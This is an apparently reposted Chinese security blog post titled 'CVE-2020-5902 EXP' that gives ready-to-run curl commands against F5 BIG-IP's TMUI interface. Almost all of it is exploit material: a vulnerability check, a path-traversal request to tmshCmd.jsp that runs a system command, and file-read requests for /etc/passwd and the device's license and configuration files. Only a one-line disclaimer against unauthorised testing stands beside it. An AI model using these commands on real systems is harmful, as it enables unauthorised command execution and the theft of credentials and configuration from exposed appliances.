CVE-2020-5902 EXP

admin 2022年3月26日02:01:51评论58 views字数 589阅读1分57秒阅读模式

请勿用于非授权渗透测试。

From:@x4ce

检测是否存在,保存为.sh文件

curl --silent --insecure 'https://[ip]/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=Vulnerable' | grep -q Vulnerable && printf '33[0;31mVulnerablen' || printf '33[0;32mNot Vulnerablen'

RCE: 

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

读文件:

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

CVE-2020-5902 EXP

CVE-2020-5902 EXP

读配置文件

https://[host]tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

或/config/bigip.conf


本文始发于微信公众号(关注安全技术):CVE-2020-5902 EXP

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月26日02:01:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-5902 EXPhttp://cn-sec.com/archives/501007.html

发表评论

匿名网友 填写信息